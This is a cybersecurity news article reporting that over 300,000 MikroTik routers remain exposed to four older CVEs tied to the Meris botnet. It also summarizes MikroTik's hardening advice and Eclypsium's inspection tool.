300,000 MikroTik Devices Still Vulnerable To Botnets For Remote Hacking

Security experts of Eclypsium have recently detected more than 300,000 vulnerable Internet-accessible MikroTik routers. These routers are being targeted by the threat actors, as the owners forgot to install firmware updates for four-year-old vulnerabilities. 

After investigating the attack, it become known that the most influenced devices were discovered in the following countries:-

  • China
  • Brazil
  • Russia
  • Italy
  • Indonesia
  • The U.S.

Rugged router swarm up for grabs

All the MikroTik devices are vulnerable to four CVEs that we have mentioned below:-

  • CVE-2019-3977: Remote OS downgrade and system reset. CVSS v3 – 7.5
  • CVE-2019-3978: Remote unauthenticated cache poisoning. CVSS v3 – 7.5
  • CVE-2018-14847: Remote unauthenticated arbitrary file access and write. CVSS v3 – 9.1
  • CVE-2018-7445: Buffer overflow enabling remote access and code execution. CVSS v3 – 9.8

Known Threats and Capabilities

The threat actors are looking at the MikroTik routers, and soon after, they found a new record-breaking DDoS attack. They got the initial reports that are simply pointing to the Meris botnet. 

And we all know that the Meris botnet runs on MikroTik routers; the capabilities illustrated in these threat attacks are quite risky and dangerous. 

The experts articulated that the ability of compromised routers is to inject malicious content, tunnel, copy, or reroute traffic that can be later used in different damaging methods.

Harden MikroTik Devices

However, MikroTik has mentioned some instructions that will help to harden the MikroTik Devices, and here we have mentioned them below:-

  • Remember to keep your MikroTik device updated.  
  • Don’t open access to your device from the internet site to everyone; only open a secured VPN service, like IPsec.
  • Always prefer a strong password, and keep changing it.
  • Do not trust your local networks.
  • Keep investigating the RouterOS configuration for unknown settings:
    • System -> Scheduler rules that execute a Fetch script. Remove these. 
    • IP -> Socks proxy. If you don’t use this feature or don’t know what it does, it must be disabled. 
    • L2TP client named “VPN” or any L2TP client that you don’t recognize. 
    • Input firewall rule that allows access for port 5678. 
    • Always block the domains and tunnel endpoints that are related to the Meris botnet.

To follow the proper guidelines, the security analysts of  Eclypsium have published a free MikroTik inspection tool that will eventually help the user to check if their device is vulnerable to CVE-2018-14847 and if it contains any indication of Mēris botnet.

These kinds of attacks are quite dangerous and have a lot of impacts, and that’s why the organizations require the capacity to recognize and evaluate this kind of attack surface in the enterprise as well as in the employee’s remote work environments.

You can follow us on LinkedinTwitterFacebook for daily Cybersecurity and hacking news updates.

BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.